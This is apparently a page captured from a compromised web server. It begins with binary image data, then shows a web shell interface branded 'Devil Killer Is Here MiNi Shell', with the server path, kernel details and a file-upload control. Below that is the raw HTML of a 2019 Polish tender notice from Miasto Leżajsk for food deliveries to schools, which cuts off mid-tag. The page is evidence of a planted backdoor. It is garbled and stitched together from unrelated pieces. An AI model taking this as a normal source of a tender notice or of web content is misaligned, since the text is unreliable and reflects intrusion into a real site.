JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20191126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20191126/628068-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 628068-N-2019 z dnia 2019-11-26 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Miasto Leżajsk</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">SUKCESYWNA DOSTAWA MIĘSA, WARZYW I OWOCÓW ORAZ JAJ W 2020 ROKU DLA OŚWIATOWYCH JEDNOSTEK ORGANIZACYJNYCH GMINY MIASTO LEŻAJSK</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Tak</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Podmiot</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Zespół Szkolno-Przedszkolny nr 1 w Leżajsku, ul. Grunwaldzka 1, 37-300 Leżajsk, krajowy nr identyfikacyjny: 367991727, Beata Wójtowicz, tel: 17 242 00 33, kopernik@pro.onet.pl</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Zespół Szkolno-Przedszkolny nr 2 w Leżajsku, ul. Mickiewicza 51, 37-300 Leżajsk, krajowy nr identyfikacyjny: 367991839, Maciej Polański, tel: 17 242 78 57, sp2lezajsk@gmail.com</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Szkoła Podstawowa Nr 3 w Leżajsku, ul. 11 Listopada 8, 37-300 Leżajsk, krajowy nr identyfikacyjny: 691556311, Małgorzata Mach, tel: 17) 242 16 49, sp3lezajsk@gmail.com</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Przedszkole Miejskie Nr 3 w Leżajsku, ul. Braci Śniadeckich 8, 37-300 Leżajsk, krajowy nr identyfikacyjny: 690035550, Lucyna Dołęga, tel: 17 242 01 43, przedszkole3lezajsk@wp.pl</TD></TR></TABLE> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy">Gmina: Miasto Leżajsk, Adres: ul. Rynek 1, 37-300 Leżajsk, podkarpackie, Tel./ Fax, 17 24 27 333, NIP: 8161673010, REGON: 690581703 przeprowadza postępowanie o udzielenie zamówienia publicznego w imieniu i na rzecz oświatowych jednostek ogranizacyjnych Gminy Miasto Leżajsk: Zespół Szkolno-Przedszkolny nr 1 w Leżajsku, ul. Grunwaldzka 1, 37-300 Leżajsk, Zespół Szkolno-Przedszkolny nr 2 w Leżajsku, ul. Mickiewicza 51, 37-300 Leżajsk, Szkoła Podstawowa Nr 3 w Leżajsku, ul. 11 Listopada 8, 37-300 Leżajsk, Przedszkole Miejskie Nr 3 w Leżajsku, ul. Braci Śniadeckich 8, 37-300 Leżajsk. Umowy zostaną podpisane przez dyrektorów ww. jednostek.</span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Miasto Leżajsk</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">69058170300000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Rynek</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">37-300</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Leżajsk</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">podkarpackie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">17 2427333, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">uml@miastolezajsk.pl, jadwiga.szkodzinska@miastolezajsk.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">17 2427333</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.miastolezajsk.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia">Gmina Miasto Leżajsk przeprowadzi postępowanie o udzielenie zamówienia. Zamówienie będzie udzielana przez każdego z zamawiających indywidualnie.</span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">https://lezajsk.um.bipgmina.pl/wiadomosci/3/lista/przetargi</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">SUKCESYWNA DOSTAWA MIĘSA, WARZYW I OWOCÓW ORAZ JAJ W 2020 ROKU DLA OŚWIATOWYCH JEDNOSTEK ORGANIZACYJNYCH GMINY MIASTO LEŻAJSK</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.271.1.16.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest zakup artykułów żywnościowych z ich sukcesywną dostawą dla wymienionych Zamawiających. Sukcesywna dostawa żywności przez Wykonawców będzie odbywać się do następujących pomieszczeń obiektów usytuowanych w Leżajsku:1) dla ZSP-1- do magazynów i kuchni w budynku szkoły przy ul. Grunwaldzkiej 1 oraz w budynku przedszkola przy ul. Mickiewicza 27,2) dla ZSP-2 - do magazynów i kuchni w budynku szkoły przy ul. Mickiewicza 51 oraz w budynku przedszkola i budynku dawnego gimnazjum przy ul. M. Curie Skłodowskiej 8,3) dla SP-3 - do magazynów i kuchni w budynku szkoły przy ul. 11 Listopada 8,4) dla PM-3 - do magazynów i kuchni w budynku przedszkola PM-3 przy ul. Braci Śniadeckich 8.W szczególnych przypadkach dopuszcza zmianę ww. adresów dla dokonywanych dostaw.Przedmiot zamówienia został podzielony na 4 części i obejmuje:Część nr 1 – Ziemniaki, warzywa i owoce (surowe)Oznaczenie przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV):03212100-1 - Ziemniaki jadalne15.30.00.00-1 - Owoce, warzywa i podobne produktyPrzedmiotem zamówienia są sukcesywne dostawy ziemniaków warzyw, owoców, ziół i przypraw świeżych w terminach:- 3 razy w tygodniu (dni wg wskazań Zamawiających) - w godzinach 7.00 – 8.00, za wyjątkiem: agrest, porzeczka czerwona, figi świeże, kaki, kukurydza kolba, liczi, marchewka mini, pitaja, pomidor koktajlowy żółty, sałata rzymska, Melon kantalupa - o pomarańczowym miąższu, Melon galia, Mandarynka - Tangerynka, Pomarańcza deserowa - odmiany Hamlin (bezpestkowa), Washington Nawel (pomarańcza z pępkiem), Salustiana, Gruszka DESEROWA - odmiany - BERA HARDY, Gruszka DESEROWA - odmiany - BERA HARDY, Gruszka deserowa – FAWORYTKA, Papryka BIAŁA, Marchewka SŁODKA, DESEROWA – KAMILIA, Gruszka RED Faworytka, Czerowna Klapsa, Jabłka – koszela, Grajpfrut CZERWONY - które będą dostarczane tylko w terminach uzgodnionych z dostawcą (w tych samych godzinach).Część nr 2 - MięsoOznaczenie przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV):15.10.00.00-9 – Produkty zwierzęce: mięso i produkty mięsnePrzedmiotem zamówienia są sukcesywne dostawy mięsa (w stanie świeżym) w terminach:3 razy w tygodniu, wg wyboru Zamawiających, w godzinach 7.00 – 8.00.Część nr 3 – WędlinyOznaczenie przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV):15.13.11.30-5 – WędlinyPrzedmiotem zamówienia są sukcesywne dostawy wędlin (w stanie świeżym) w terminach:– 3 razy w tygodniu, wg wyboru Zamawiających, w godzinach 7.00 – 8.00.Część nr 4 – JajaOznaczenie przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV):03.14.25.00-3 – JajaPrzedmiotem zamówienia są sukcesywne dostawy jaj kurzych w terminach:- 2 razy w tygodniu (wtorek, piątek), w godzinach 7.30 – 10.00.Bieżące ww. sukcesywne dostawy będą zgłaszane nie później niż w dniu poprzedzającym dostawę, przez upoważnionych przedstawicieli Zamawiających. Zamówienia będą zgłaszane w formie faksu, maila lub pisemnie i dodatkowo potwierdzane telefonicznie.Dostawy dokonywane będą w dni robocze: w szkołach w okresach prowadzenia nauki, w przedszkolach - średnio przez 10 miesięcy edukacji przedszkolnej i jednego miesiąca wakacyjnego.Zamawiana żywność musi spełniać wymagania w zakresie obowiązujących przepisów prawa żywnościowego, zgodnie z poniższymi aktami prawnymi:1) ustawa z dnia 25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia (Dz. U. tj. z 2018 roku, poz. 1541 z późn. zmianami) wraz z aktami wykonawczymi,2) ustawa z dnia 16 grudnia 2005 roku o produktach pochodzenia zwierzęcego (Dz. U. tj. z 2017 roku, poz. 242 z późn. zmianami) wraz z aktami wykonawczymi,3) ustawa z dnia 21 grudnia 2000 roku o jakości handlowej artykułów rolno-spożywczych (Dz. U. tj. z 2018 roku, poz. 2164) wraz z aktami wykonawczymi:4) Rozporządzenie Ministra Rolnictwa i Rozwoju Wsi - w sprawie znakowania poszczególnych rodzajów środków spożywczych ( Dz. U. z 2017 r., poz. 2461),5) Rozporządzenie Ministra Zdrowia z dnia 26 lipca 2016 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach (Dz. U. z 2016, poz.1154).6) Rozporządzenie Ministra Zdrowia z dnia 16 września 2010 r. w sprawie środków spożywczych specjalnego przeznaczenia żywieniowego (Dz. U. tj. z 2015, poz. 1026).Wyjątkiem jest żywność zamawiana sporadycznie (kilkakrotnie w ciągu roku), w tym okazjonalnie zamawiane słodycze np. na Mikołajki, Dzień Przedszkolaka itp., która nie będzie spełnić powyższych wymagań. Wymagane jest oznakowanie dostarczanej żywności zgodnie z ww. przepisami. Produkty oznaczone etykietą powinny zawierać dane: nazwę produktu, skład surowcowy, wartości energetyczne, oznaczenie partii, klasy jakości, termin przydatności do spożycia/minimalnej trwałości.Minimalne wymagania dotyczące świeżości zamawianej żywności: przed połową okresu przydatności do spożycia (dla produktów nietrwałych) lub okresu wyznaczonego przez termin minimalnej trwałości (dla produktów trwałych). Powyższe wymaganie dotyczy wszystkich artykułów żywnościowych. Wykonawca będzie dostarczał zamawianą żywność do Zamawiającego (wraz z jej rozładunkiem) do wskazanych pomieszczeń w obiektach Zamawiających oraz będzie zobowiązany do używania środków transportu przystosowanych do przewozu danej żywności zgodnie z obowiązującymi przepisami w tym zakresie - na jego własny koszt.Wykonawca zagwarantuje wymaganą dobrą jakość dostarczanej żywności w zakresie spełniania wymagań sanitarnych i higienicznym przewidzianych dla żywności na terenie Rzeczypospolitej Polskiej.Szczegółowy opis/parametry produktów żywnościowych wraz z podaniem ich ilości w zakresie przedmiotu zamówień/części zamówień określony został w załącznikach od nr 2.1 ÷ 2.4 stanowiących formularze cenowe. Ilości wskazane w formularzach cenowych stanowią prognozy zużycia żywności mające odzwierciedlenie w cenach złożonych ofert w celu dokonania ich oceny.Ryzyko zmian cen Wykonawca uwzględnia w wartościach jednostkowych zawartych w ofercie. Zaoferowane przez Wykonawców w formularzach cenowych wartości jednostkowe nie ulegną zmianom - poza przypadkami określonymi w SIWZ.Wynikające z wyliczeń w formularzach cenowych zaoferowane ceny dla poszczególnych Zamawiających będą określać nominalne wartości przyszłych zobowiązań wynikających z ilości przewidywanej do zakupu żywności w zawartych umowach dostawy. Faktyczne ilości i wartości dostaw, które Wykonawcy będą zobowiązani realizować w okresie trwania umowy, wynikać będą z sukcesywnych dostaw wg zgłoszeń Zamawiających.Jeżeli w opisie przedmiotu zamówienia zostały wskazane znaki towarowe, patenty lub pochodzenie zgodnie z art. 29 ust. 3 ustawy Pzp, a jest to uzasadnione specyfiką przedmiotu zamówienia, ponieważ Zamawiający nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, przyjmuje się, że wskazaniu takiemu towarzyszą wyrazy „lub równoważny”.Opisując przedmiot zamówienia przez odniesienie do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, zgodnie z art. 30 ust 1 pkt 2 i ust. 3 ustawy Pzp, Zamawiający dopuszcza również rozwiązania równoważne opisywanym Określenie standardów jakościowych odnoszących się do wszystkich istotnych cech przedmiotu zamówienia: Standardy jakościowe zostały określone w szczegółowym opisie przedmiotu zamówienia oraz w przepisach prawa ww. w SIWZ.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">15000000-8</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>03212100-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15300000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15100000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15131130-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>03142500-3</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span 